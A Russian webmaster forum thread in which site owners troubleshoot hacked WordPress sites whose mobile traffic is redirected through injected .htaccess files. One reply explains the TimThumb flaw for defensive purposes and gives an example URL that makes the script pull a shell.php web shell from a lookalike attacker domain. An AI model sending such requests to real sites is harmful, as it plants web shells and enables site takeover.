- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
логи нужны.
тогда и дыру можно будет найти.
Логи наши други - це факт. ТС, скока весит файл с логами(все не надо, надо с момента "болезни" сайта)? В принципе можете выложить на ФО сами логи, а нам дать ссылку. Думаю, так будет быстрей:)
Как вариант поставить права 444 на .htaccess, если не стоит.
И искать shell :)
Наблюдаю пару дней топик, дай думаю, пару часов назад, проверю свои сайты! Каково было мое удивление, когда я увидел, что ВСЕ сайты были прохаканы аналогичным способом, кто то спокойно лил мобильный трафик...... :)
Как вариант поставить права 444 на .htaccess, если не стоит.
Он их и с этими правами и сам ставит замечательно. Его не останавливает.
Наблюдаю пару дней топик, дай думаю, пару часов назад, проверю свои сайты! Каково было мое удивление, когда я увидел, что ВСЕ сайты были прохаканы аналогичным способом, кто то спокойно лил мобильный трафик...... :)
А может у вас на сайтах не только мобильный траф лили? У кого проблемы стучите проверим на вирусы и др. вредоносные скрипты = дадим рекомендации!
На фтп пароли сперли скорей всего. У меня такое с джумлой было. В конце index.php дописывалась всякая хрень. Сменил пасы и все ок.
Та же фигня. Пассы ФТП менял, без толку ( Загадили не только вордпрессы, но и все соседние сайты, даже чистую статику.
---------- Добавлено 01.11.2012 в 02:26 ----------
Его не останавливает.
блин... тоже всем 444 поставил.. :)
Проверьте у себя в шаблонах, нет ли там папка scripts с файлом timthumb.php ?
обычно можно этот баг использовать чтобы залить веб шел к вам на хост.
выглядит по типу:
/wp-content/themes/blablabla/scripts/timthumb.php?src=http://picasa.com.dom.com/shell.php
Дело в том, что тот скрипт может закачивать файлы с picasa.com, но он не контролирует данный процесс точности домена, если у вас можно так закачать файл то проверяйте в тойже папки scripts папку cache на наличие в ней файлов с расширением .php
Если нашли и получается таким образом закачать файлы на хост, то обновляйте движок и все возможные плагины.
Та же фигня. Пассы ФТП менял, без толку ( Загадили не только вордпрессы, но и все соседние сайты, даже чистую статику.
Ага, тоже все пароли меняла, вычищала. Началось все, кстати, с плагина на купленном сайте, назывался "mobi", если память не изменяет... проверьте на лишние :) Этот плагин не только в корни сайтов .htaccess лил, но и во все вложенные папки. После удаления через неделю было тихо, потом снова.
А может у вас на сайтах не только мобильный траф лили?
Мобильный в основном, еще какие-то переходы с некоторых полумертвых поисковиков вроде забирали. Сайты, на которые переправляет, кстати, постоянно меняются.